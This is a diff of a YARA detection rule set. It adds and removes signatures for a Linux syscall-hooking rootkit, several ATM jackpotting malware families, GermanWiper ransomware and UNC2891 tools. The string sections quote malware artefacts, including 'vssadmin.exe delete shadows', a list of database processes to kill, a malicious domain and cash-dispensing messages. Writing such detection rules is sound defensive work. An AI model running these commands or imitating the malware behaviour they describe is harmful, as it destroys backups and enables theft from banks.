+            48 01 C6 48 01 CE 48 81 FE ?? ?? ?? ?? 75 ?? 48 8D 3C 01 EB ?? 48 FF C0 48 83 F8 ??
+            75 ?? 48 89 BA ?? ?? ?? ?? 48 81 C2 ?? ?? ?? ?? 48 81 FA ?? ?? ?? ?? 75 ?? 48 C7 C3
+            ?? ?? ?? ?? 49 C7 C5 ?? ?? ?? ?? 48 83 7B ?? ?? 0F 85 ?? ?? ?? ?? 48 C7 C7 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 C7 C7 ?? ?? ?? ?? 4C 8B 25 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 3B
+            2E E8 ?? ?? ?? ?? 49 89 C4 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 43 ?? 48 8B 05 ?? ?? ??
+            ?? 4D 8D 74 24 ?? 4D 89 E7 48 8B 40 ?? 48 89 45 ?? 48 8B 75 ?? BA ?? ?? ?? ?? 4C 89
+            FF E8 ?? ?? ?? ?? 85 C0 74 ?? 49 FF C7 4D 39 FE 75 ?? EB ?? 4D 85 FF 74 ?? 31 C0 4D
+            39 FC 0F 94 C0 89 43 ?? 74 ?? 31 C0 41 81 3C 24 ?? ?? ?? ?? 0F 94 C0 89 43 ?? 4C 89
+            7B ?? 83 7B ?? ?? 74 ?? 48 8B 43 ?? 4C 89 20 83 7B ?? ?? 74 ?? 48 8B 43 ?? 48 8B 53
+            ?? 48 83 C0 ?? 48 89 02 83 7B ?? ?? 75 ?? 48 8B 73 ?? 48 85 F6 74 ?? 48 C7 43 ?? ??
+            ?? ?? ?? 4C 8D 63 ?? 31 C9 31 D2 48 C7 43 ?? ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 85
+            C0 75 ?? 4C 89 E7 E8 ?? ?? ?? ?? 85 C0 75 ?? C7 43 ?? ?? ?? ?? ?? 48 81 C3 ?? ?? ??
+            ?? 49 39 DD 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 90 ?? ?? ??
+            ?? 48 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 50 ?? 48 C7 40 ?? ??
+            ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 48 C7 80
+        }
+		$hooking_syscalls_mechanism_p2 = {
+            48 89 15 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 48 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 15
+            ?? ?? ?? ?? 48 8B 50 ?? 48 C7 40 ?? ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 90 ?? ??
+            ?? ?? 48 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 48
+            C7 80 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 48 C7 80 ??
+            ?? ?? ?? ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 50 ?? 48 C7 40 ?? ?? ?? ?? ?? 48 89
+            15 ?? ?? ?? ?? 48 8B 50 ?? 48 C7 40 ?? ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 90 ??
+            ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 48 C7 80 ?? ?? ?? ?? ?? ?? ?? ??
+            48 89 15 ?? ?? ?? ?? 48 8B 50 ?? 48 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 15 ?? ?? ??
+            ?? 48 8B 90 ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 90 ?? ??
+            ?? ?? 48 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 50 ?? 48 C7 80 ??
+            ?? ?? ?? ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 10 48 C7 40 ?? ?? ?? ?? ?? 48 89 15
+            ?? ?? ?? ?? 48 8B 50 ?? 48 C7 00 ?? ?? ?? ?? 48 89 15 ?? ?? ?? ?? 48 8B 90 ?? ?? ??
+            ?? 48 C7 40 ?? ?? ?? ?? ?? 48 C7 80
+        }
+		$hook_rmdir_1 = {
+            E8 ?? ?? ?? ?? 55 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 E5 41 57 41 56 41 55 41 54 53
+            48 89 FB 48 81 EC ?? ?? ?? ?? 4C 8B 67 ?? 48 8D BD ?? ?? ?? ?? 65 48 8B 04 25 ?? ??
+            ?? ?? 48 89 45 ?? 31 C0 48 C7 45 ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 4C
+            89 E6 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? F3 48 AB 48 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 85 C0 7F ?? 48 8B 05 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 55 ?? 65 48 2B 14
+            25 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 41 5C 41 5D 41 5E 41 5F 5D
+            E9 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 3D ?? ?? ?? ??
+            0F 87 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 83 F8 ?? 76 ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? 31 C0 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F B6 B4 05
+            ?? ?? ?? ?? 40 38 B0 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 83 C0 ?? 48 83 F8 ?? 75 ?? BE
+            ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 8D 50 ?? 83 FA ?? 0F 8E ?? ?? ?? ?? 0F B6 B5 ?? ?? ?? ?? 83 FA ??
+            7E ?? 40 80 FE ?? 7E ?? 83 E8 ?? BA ?? ?? ?? ?? 85 C0 7F ?? EB ?? 39 C8 7E ?? 0F B6
+            8C 15 ?? ?? ?? ?? 88 8C 15 ?? ?? ?? ?? 89 D1 48 83 C2 ?? 83 F9 ?? 75 ?? 40 80 FE ??
+            0F 84 ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 40 80 FE ?? 0F 84 ?? ?? ?? ?? 0F 8E ?? ?? ?? ??
+            40 80 FE ?? 0F 85 ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 48 63 90 ?? ?? ?? ?? 48 85
+            D2 0F 8E ?? ?? ?? ?? 48 C7 C0 ?? ?? ?? ?? 49 C7 C5 ?? ?? ?? ?? EB ?? 48 83 C0 ?? 48
+            3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 3B 10 75 ?? 48 8B 3D ?? ?? ?? ?? BA
+        }
+		$hook_rmdir_2 = {
+            BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 4C 8B
+            05 ?? ?? ?? ?? 48 8B BD ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? 48 C7 C2 ?? ?? ?? ?? BE ??
+            ?? ?? ?? 49 C7 C6 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 89 C7 41 80 7D ?? ?? 4C 89 E9 75 ??
+            41 8B 06 85 C0 74 ?? 48 C7 C1 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 49 63
+            FF 4D 89 F0 44 29 FE 48 C7 C2 ?? ?? ?? ?? 48 63 F6 48 01 C7 E8 ?? ?? ?? ?? 41 01 C7
+            49 83 C5 ?? 49 83 C6 ?? 49 81 FD ?? ?? ?? ?? 75 ?? 48 8B 85 ?? ?? ?? ?? BE ?? ?? ??
+            ?? 49 63 FF 48 C7 C2 ?? ?? ?? ?? 44 29 FE 48 63 F6 48 01 C7 E8 ?? ?? ?? ?? 46 8D 2C
+            38 4D 63 ED 49 81 FD ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 4C 8B BD ?? ?? ?? ?? BA ?? ?? ??
+            ?? 4C 89 EE 4C 89 FF E8 ?? ?? ?? ?? 4C 89 EA 4C 89 FE 4C 89 E7 E8 ?? ?? ?? ?? 48 8B
+            BD
+        }
+		$hook_rmdir_3 = {
+            49 83 C5 ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 41 80 7D ?? ?? 75 ?? 48 98 48 8D B5 ??
+            ?? ?? ?? 48 8D BD ?? ?? ?? ?? 48 8D 04 40 48 C1 E0 ?? C6 80 ?? ?? ?? ?? ?? 48 8B 95
+            ?? ?? ?? ?? 4C 8D A0 ?? ?? ?? ?? 48 89 90 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 49 89 44 24 ?? E8 ?? ?? ?? ?? 49 89 44 24 ?? E9 ?? ?? ?? ?? 40 80 FE ?? 0F 84
+            ?? ?? ?? ?? 40 80 FE ?? 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 3D ?? ?? ?? ?? ?? 0F
+            8F ?? ?? ?? ?? 65 48 8B 04 25 ?? ?? ?? ?? 48 63 B8 ?? ?? ?? ?? 48 89 3D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C7 48 85 C0 0F 84 ?? ?? ??
+            ?? 48 C7 40 ?? ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? 48 C7 40
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 48 C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 48 8D 8D ??
+            ?? ?? ?? BE ?? ?? ?? ?? 31 D2 EB ?? 8D 14 92 8D 54 50 ?? 0F BE 41 ?? 48 83 C1 ?? 84
+            C0 0F 84 ?? ?? ?? ?? 8D 78 ?? 40 80 FF ?? 76 ?? 3C ?? 0F 85 ?? ?? ?? ?? 81 FA ?? ??
+            ?? ?? 0F 8F ?? ?? ?? ?? 83 FE ?? 0F 8F ?? ?? ?? ?? 48 63 C6 83 EE ?? 89 94 85 ?? ??
+            ?? ?? 31 D2 EB ?? 49 C7 C5 ?? ?? ?? ?? 49 8B 45 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 49 83
+            7D ?? ?? 0F 89 ?? ?? ?? ?? 4D 85 ED 0F 84 ?? ?? ?? ?? 41 8B 45 ?? BA ?? ?? ?? ?? 4C
+            89 E7 48 8D B5 ?? ?? ?? ?? 4D 8D B5 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 49
+        }
+		$hook_rmdir_4 = {
+            8D 75 ?? 49 8D 7C 24 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 F7 E8 ??
+            ?? ?? ?? 49 89 C7 48 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 89 C6 BA
+            ?? ?? ?? ?? 4C 89 F7 E8 ?? ?? ?? ?? 49 8D 7C 24 ?? 4C 89 F6 4C 89 FA E8 ?? ?? ?? ??
+            BE ?? ?? ?? ?? 4C 89 F7 E8 ?? ?? ?? ?? 48 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 0F 84 ??
+            ?? ?? ?? 49 63 8D ?? ?? ?? ?? 83 C0 ?? 4D 8D 7D ?? 49 01 C4 48 81 F9 ?? ?? ?? ?? 0F
+            87 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 4C 89 FF 48 89 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8B 95 ?? ?? ?? ?? 4C 89 FE 4C 89 E7 E8 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 4C 89 F7
+            BA ?? ?? ?? ?? F3 48 AB 31 F6 4C 89 FF E8 ?? ?? ?? ?? 41 C7 45 ?? ?? ?? ?? ?? 49 C7
+            45 ?? ?? ?? ?? ?? 41 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 49 C7 45 ?? ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 49 8D 95 ?? ?? ?? ?? 49 81 FD ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 49 89 D5 E9 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 89 C7 48 85 C0 0F 84 ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? 48
+            C7 40 ?? ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            31 C0 E9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 C7 C6 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? BE ?? ?? ?? ?? 31 D2 48 63 F6 89 94 B5 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? C1 E2 ?? C1 E0 ?? 09 C2 8B 85 ?? ?? ?? ?? 0B 95 ?? ?? ?? ?? C1 E0 ??
+            09 C2 0F 84
+        }
+		$hook_gdents64 = {
+            E8 ?? ?? ?? ?? 55 48 89 E5 41 57 41 56 41 55 41 54 53 48 83 EC ?? 48 8B 47 ?? 4C 8B
+            6F ?? 48 89 45 ?? 48 8B 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 63 D8 89 45
+            ?? 49 89 C4 48 89 DF E8 ?? ?? ?? ?? 48 89 45 ?? 45 85 E4 7E ?? 48 85 C0 74 ?? 48 89
+            C7 31 D2 48 89 DE 49 89 C6 E8 ?? ?? ?? ?? 48 8B 75 ?? 48 89 DA 4C 89 F7 E8 ?? ?? ??
+            ?? 49 89 C4 48 85 C0 74 ?? 48 8B 7D ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 D8 5B 41 5C
+            41 5D 41 5E 41 5F 5D E9 ?? ?? ?? ?? 44 89 EF 48 C7 C3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            C7 45 ?? ?? ?? ?? ?? 89 45 ?? EB ?? 8B 45 ?? 85 C0 74 ?? 4C 89 75 ?? 41 0F B7 46 ??
+            4C 63 6D ?? 49 01 C4 4D 39 EC 0F 83 ?? ?? ?? ?? 48 8B 45 ?? 83 7D ?? ?? 4E 8D 34 20
+            75 ?? 4D 89 F5 49 83 C5 ?? 0F 84 ?? ?? ?? ?? 49 C7 C7 ?? ?? ?? ?? EB ?? 49 83 C7 ??
+            4C 39 FB 74 ?? 41 80 3F ?? 74 ?? 4C 89 EE 4C 89 FF E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B
+            45 ?? 49 39 C6 74 ?? 48 8B 4D ?? 41 0F B7 46 ?? 66 01 41 ?? EB ?? 49 83 FE ?? 74 ??
+            41 81 7E ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 45 ?? 49 39 C6 75 ?? 0F B7 50 ?? 29
+            55 ?? 48 89 C7 4C 63 6D ?? 48 8D 34 10 4C 89 EA E8 ?? ?? ?? ?? 4D 39 EC 0F 82 ?? ??
+            ?? ?? 4C 89 EB 49 81 FD ?? ?? ?? ?? 77 ?? 4C 8B 75 ?? 4C 89 EE BA ?? ?? ?? ?? 4C 89
+            F7 E8 ?? ?? ?? ?? 48 8B 7D ?? 4C 89 EA 4C 89 F6 E8
+        }
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		uint32( 0 ) == 0x464C457F and ( all of ( $hooking_syscalls_mechanism_p* ) ) and ( all of ( $hook_rmdir_* ) ) and ( $hook_gdents64 )
 }
-rule R3C0NST_ATM_Malware_NVISOSPIT : FILE
+/*
+ * YARA Rule Set
+ * Repository Name: R3c0nst
+ * Repository: https://github.com/fboldewin/YARA-rules/
+ * Retrieval Date: 2026-03-01
+ * Git Commit: 54e9e6899b258b72074b2b4db6909257683240c2
+ * Number of Rules: 26
+ * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
+ *
+ *
+ * LICENSE
+ *
+ * NO LICENSE SET
+ */
+rule R3C0NST_ATM_Malware_XFS_DIRECT : FILE
 {
 	meta:
-		description = "Detects ATM Malware NVISOSPIT"
+		description = "Detects ATM Malware XFS_DIRECT"
 		author = "Frank Boldewin (@r3c0nst)"
-		id = "faf9e78e-9d7a-5c9b-a08e-90b895333d5c"
-		date = "2019-05-31"
-		modified = "2019-05-31"
-		reference = "https://twitter.com/r3c0nst/status/1134403094157115392"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.NVISOSPIT.yar#L3-L18"
+		id = "d1551c50-d3d2-56fd-a6b7-198d3a26ac72"
+		date = "2019-10-18"
+		modified = "2019-10-19"
+		reference = "https://twitter.com/r3c0nst/status/1185237040583106560"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.XFS_DIRECT.yar#L1-L37"
 		license_url = "N/A"
-		hash = "d7ce7b152f0da49e96fa32a9336b35253905d9940b001288d0df55d8f8b3951f"
-		logic_hash = "11c1fea74b72a7821ce76a95846a2caff7354e71906496d9530cb44339a49a98"
+		logic_hash = "844a334d0eb8516c0ef3780e48e3dbc8e23d41c80bdff10f01407b775e72709e"
 		score = 75
 		quality = 90
 		tags = "FILE"
+		hash1 = "3e023949fecd5d06b3dff9e86e6fcac6a9ec6c805b93118db43fb4e84fe43ee0"
+		hash2 = "303f2a19b286ca5887df2a334f22b5690dda9f092e677786e2a8879044d8ad11"
+		hash3 = "15d50938e51ee414124314095d3a27aa477f40413f83d6a2b2a2007efc5a623a"
+		hash4 = "0f9cb4dc1ac2777be30145c3271c95a027758203d0de245ec390037f7325d79d"
+		hash5 = "141ae291ddae60fd1b232f543bc9b40f3a083521cd7330c427bb8fc5cdd23966"
+		hash6 = "66eb1a8134576db05382109eec7e297149f25a021aba5171d2f99aa49c381456"
+		hash7 = "ac20b12beefb2036595780aaf7ec29203e2e09b6237d93cd26eaa811cebd6665"
+		hash8 = "901fc474f50eb62edc526593208a7eec4df694e342ffc5b895d1dcec953c6899"
+		hash9 = "56548c26741b25b15c27a0de498c5e04c69b0c9250ba35e3a578bc2f05eedd07"
+		hash10 = "c89f1d562983398ab2d6dd75e4e30cc0e95eab57cdf48c4a17619dca9ecc0748"
 
 	strings:
-		$MalwareName = "NVISOSPIT" ascii fullword
-		$DispenseCommand = "Calling WFSExecute() to dispense $%d" fullword ascii
-		$Code = {C6 85 7D F9 FF FF 4D C6 85 7E F9 FF FF 4D C6 85 7F F9 FF FF 4B}
+		$EncLayer1 = {0F B6 51 FC 30 50 FF 0F B6 11 30 10 0F B6 51 04 30 50 01 0F B6 51 08 30 50 02}
+		$EncLayer2 = {B8 4D 5A 00 00 89 33 66 39 06 75 ?? 8b ?? 3c}
+		$String1 = "NOW ENTER MASTER KEY" ascii nocase
+		$String2 = "Closing app, than delete myself." ascii nocase
+		$String3 = "Number of phisical cash units is:" ascii nocase
+		$String4 = "COULD NOT ENABLE or DISABLE connection" ascii nocase
+		$String5 = "XFS_DIRECT" ascii nocase
+		$String6 = "Take the money you snicky mother fucker :)" ascii nocase
+		$String7 = "ATM IS TEMPORARILY OUT OF SERVICE!" wide nocase
+		$Code1 = {D1 F8 89 44 24 10 DB 44 24 10 DC 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 35 2F 81 0B 00 A3}
+		$Code2 = {8B ?? ?? ?? 68 2E 01 00 00 52 C7 ?? 06 01 00 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 100KB and 2 of them
+		uint16( 0 ) == 0x5A4D and ( filesize < 1500KB and all of ( $EncLayer* ) ) or ( filesize < 300KB and 4 of ( $String* ) and all of ( $Code* ) )
 }
-rule R3C0NST_ATM_Malware_Dispcashbr : FILE
+
+rule R3C0NST_ATM_Malware_ATMITCH : FILE
 {
 	meta:
-		description = "Detects ATM Malware DispCashBR"
+		description = "Detects ATM Malware ATMItch"
 		author = "Frank Boldewin (@r3c0nst)"
-		id = "17d22120-0ca2-5b27-9816-21ab4a6fb20c"
-		date = "2020-02-27"
-		modified = "2020-08-17"
-		reference = "https://twitter.com/r3c0nst/status/1232944566208286720"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.DispCashBR.yar#L1-L21"
+		id = "4d7e9615-9db6-5fc7-b95e-b8c7b2c034a8"
+		date = "2019-03-18"
+		modified = "2019-03-18"
+		reference = "https://github.com/fboldewin/YARA-rules/"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.ATMItch.yar#L3-L14"
 		license_url = "N/A"
-		logic_hash = "3fb5d62cb779ddc13e9b938290dfa9d2a3353d7969e639a662c1bcaca945de4d"
+		logic_hash = "4278cbcd8c465ba57b65a166e0bd48dcc73eae8660972478d3116bc0d73cf3c4"
 		score = 75
-		quality = 90
+		quality = 82
 		tags = "FILE"
-		hash1 = "7cea6510434f2c8f28c9dbada7973449bb1f844cfe589cdc103c9946c2673036"
 
 	strings:
-		$String1 = "(*) Dispensando: %lu" ascii nocase
-		$String2 = "COMANDO EXECUTADO COM SUCESSO" ascii nocase
-		$String3 = "[+] FOI SACADO:  %lu R$ [+]" ascii nocase
-		$DbgStr1 = "_Get_Information_cdm_cuinfo" ascii nocase
-		$DbgStr2 = "_GET_INFORMATION_SHUTTER" ascii nocase
-		$Code1 = {C7 44 24 08 00 00 00 00 C7 44 24 04 2F 01 00 00 89 04 24 E8}
-		$Code2 = {C7 44 24 08 00 00 00 00 C7 44 24 04 17 05 00 00 89 04 24 E8}
-		$Code3 = {89 4C 24 08 C7 44 24 04 2E 01 00 00 89 04 24 E8}
+		$STRING1 = "SCREEN and think what does you DO" nocase ascii wide
+		$STRING2 = "Receive CASH UNIT info first, then LOOK on" nocase ascii wide
+		$STRING3 = "Unknown command mnemonic, check it and repeat again" nocase ascii wide
+		$STRING4 = "Catch some money, bitch!" nocase ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 100KB and 2 of ( $String* ) and 1 of ( $DbgStr* ) and all of ( $Code* )
+		( uint16( 0 ) == 0x5A4D and 1 of them ) or ( pe.imphash ( ) == "655ad5439db0832c5a3f86d0a68ddaac" )
 }
-rule R3C0NST_UNC2891_Caketap
+rule R3C0NST_Ransomware_Germanwiper : FILE
 {
 	meta:
-		description = "Detects UNC2891 Rootkit Caketap"
+		description = "Detects RansomWare GermanWiper in Memory or in unpacked state"
 		author = "Frank Boldewin (@r3c0nst)"
-		id = "9c2ffe3d-69ca-5f93-bdb1-40e449139dec"
-		date = "2022-03-30"
-		modified = "2023-01-05"
-		reference = "https://github.com/fboldewin/YARA-rules/"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/UNC2891_Caketap.yar#L1-L16"
+		id = "ea71849e-62a1-5b4d-9cf7-0728192361cc"
+		date = "2019-08-05"
+		modified = "2019-08-05"
+		reference = "https://twitter.com/r3c0nst/status/1158326526766657538"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Ransomware.Germanwiper.yar#L1-L25"
 		license_url = "N/A"
-		logic_hash = "530a7d062a218217d2c05460428b2576c3fe2a6099c93940aabde73c513a8914"
+		logic_hash = "563ad59abd09d9a5fcfcf5ed48dc1e3c48b4bb198c20721d5af531da20d2b0d3"
 		score = 75
-		quality = 88
-		tags = ""
+		quality = 90
+		tags = "FILE"
+		hash_packed = "41364427dee49bf544dcff61a6899b3b7e59852435e4107931e294079a42de7c"
+		hash_unpacked = "708967cad421bb2396017bdd10a42e6799da27e29264f4b5fb095c0e3503e447"
 
 	strings:
-		$str1 = ".caahGss187" ascii fullword
-		$str2 = "ipstat" ascii
-		$code1 = {41 80 7E 06 4B 75 ?? 41 80 7E 07 57 75 ?? 41 0F B6 46 2B}
-		$code2 = {41 C6 46 01 3D 41 C6 46 08 32}
+		$PurgeCode = {6a 00 8b 47 08 50 6a 00 6a 01 e8 ?? ?? ?? ?? 50 e8 ?? ?? ?? ?? 8b f0 8b d7 8b c3 e8}
+		$Mutex1 = "HSDFSD-HFSD-3241-91E7-ASDGSDGHH" nocase ascii
+		$Mutex2 = "cFgxTERNWEVhM2V" nocase ascii
+		$ProcessKill1 = "oracle.exe" nocase ascii
+		$ProcessKill2 = "sqbcoreservice.exe" nocase ascii
+		$ProcessKill3 = "isqlplussvc.exe" nocase ascii
+		$ProcessKill4 = "mysqld.exe" nocase ascii
+		$KillShadowCopies = "vssadmin.exe delete shadows" nocase ascii
+		$Domain1 = "cdnjs.cloudflare.com" nocase ascii
+		$Domain2 = "expandingdelegation.top" nocase ascii
+		$RansomNote = "Entschluesselungs_Anleitung.html" nocase ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and ( all of ( $code* ) or ( all of ( $str* ) and #str2 == 2 ) )
+		uint16( 0 ) == 0x5A4D and filesize < 1000KB and 5 of them
 }
-
-rule R3C0NST_ATM_Malware_Dispenserxfs : FILE
+rule R3C0NST_ATM_Malware_Xfscashncr : FILE
 {
 	meta:
-		description = "No description has been set in the source file - R3c0nst"
-		author = "Frank Boldewin"
-		id = "52b1aa57-283b-54d7-bd1b-fb5da5f8d269"
-		date = "2019-02-27"
-		modified = "2019-02-28"
-		reference = "https://github.com/fboldewin/YARA-rules/"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.DispenserXFS.yar#L3-L13"
+		description = "Detects ATM Malware XFSCashNCR"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "8886cd00-4f4a-5f25-99e0-0806f5e1b4b4"
+		date = "2019-08-28"
+		modified = "2019-08-28"
+		reference = "https://twitter.com/r3c0nst/status/1166773324548063232"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.XFSCashNCR.yar#L1-L21"
 		license_url = "N/A"
-		logic_hash = "0e588e2ba03d5eb750183600cce278e791a71f86fbf933ba9d7fda352bd37e2f"
+		logic_hash = "87f197058d4b515cb4829b5e403a96b88eb95cda81e53a9e1484df8c743d8c4a"
 		score = 75
-		quality = 59
+		quality = 90
 		tags = "FILE"
+		hash1 = "d6dff67a6b4423b5721908bdcc668951f33b3c214e318051c96e8c158e8931c0"
 
 	strings:
-		$Code_Bytes = { 68 FF FF 00 00 68 60 EA 00 00 6A 10 }
-		$XFSKILL = "injected mxsfs killer into" nocase ascii wide
-		$PDB = "C:\\_bkittest\\dispenser\\Release_noToken\\dispenserXFS.pdb" nocase ascii wide
+		$Code1 = {50 8b 4d e8 8b 51 10 52 6a 00 68 2d 01 00 00 8b 45 e8 0f b7 48 1c 51 e8}
+		$Code2 = {52 8d 45 d0 50 68 2e 01 00 00 8b 4d e8 0f b7 51 1c 52 e8}
+		$StatusMessage1 = "[+] Ingrese Denominacion ISO" nocase ascii
+		$StatusMessage2 = "[+] Ingrese numero de billetes" nocase ascii
+		$StatusMessage3 = "[!] FAIL.. dispensadores no encontrados" nocase ascii
+		$StatusMessage4 = "[!] Unable continue, IMPOSIBLE abrir dispenser" nocase ascii
+		$PDB = "C:\\Users\\cyttek\\Downloads\\xfs_cashXP\\Debug\\xfs_cash_ncr.pdb" nocase ascii
+		$LogFile = "XfsLog.txt" nocase ascii
 
 	condition:
-		(hash.sha256 ( 0 , filesize ) == "867991ade335186baa19a227e3a044c8321a6cef96c23c98eef21fe6b87edf6a" ) or ( uint16( 0 ) == 0x5A4D and 1 of them )
+		uint16( 0 ) == 0x5A4D and filesize < 1500KB and 4 of them
 }
 
 rule R3C0NST_ATM_Malware_Atmspitter : FILE
@@ -60599,34 +60403,31 @@ rule R3C0NST_ATM_Malware_Atmspitter : FILE
 	condition:
 		(hash.sha256 ( 0 , filesize ) == "4035d977202b44666885f9781ac8755c799350a03838ff782eb730c0d7069958" ) or ( $Code_Bytes and $Service )
 }
-rule R3C0NST_ATM_Malware_Ripper : ATMRIPPER MALWARE FILE
+rule R3C0NST_UNC2891_Steelcorgi : FILE
 {
 	meta:
-		description = "Rule detects Thailand ATM Jackpot malware RIPPER (unpacked)"
-		author = "Frank Boldewin"
-		id = "38dfda5b-45cc-55d4-b619-91fa31c09a09"
-		date = "2016-08-01"
-		modified = "2019-02-27"
+		description = "Detects UNC2891 Steelcorgi packed ELF binaries"
+		author = "Frank Boldewin (@r3c0nst)"
